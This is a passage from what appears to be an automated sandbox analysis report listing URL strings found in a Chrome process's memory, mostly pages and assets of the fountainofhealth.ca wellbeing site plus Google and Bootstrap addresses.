                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkehgbnf
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/lnu3li27zsanbe2hcsfjuvm5fq_1.0.7.1744928549/laoigpbl
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478462011.000028EC03084000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475912071.000028EC02D68000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477145789.000028EC02F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en#main-content
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en(
                                  Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/about-us
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/form/contact-us
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/home
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/node/113
                                  Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385216493.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2341844101.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/search/node
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/thrive-c-approach-wellbeing
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/thrive/resources
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enAgent
                                  Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enHome
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enL
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enb
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/enca
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/form/contact-us
                                  Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/fr/node/113
                                  Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/individuals
                                  Source: chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/ipt
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320046905.000028EC053E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315336209.000028EC06A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/libraries/json2/json2.js?v=2misc/dialog.ajax.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/throbber-general.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/css/wave.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0les/views_slidesho
                                  Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500106233.000028EC0652C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315393234.000028EC04AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
                                  Source: chrome.exe, 00000000.00000002.2495959896.000028EC048B8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490480203.000028EC03F98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swjs
                                  Source: chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472993103.000028EC029B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/n
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/om/
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/organizations
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/our-people-partners
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/our-research
                                  Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/ript
                                  Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2378748801.000028EC03845000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472109476.000028EC02820000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355559517.000028EC0799C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505494576.000028EC07B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 
https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/document/Tips%20to%20THRIVE%20-%202024.pdf
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.png
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Info-Blue.pngng
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482432826.000028EC03468000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-r_1.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469175116.000028EC023AC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-t_2.png
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#affix
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#alerts
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#buttons
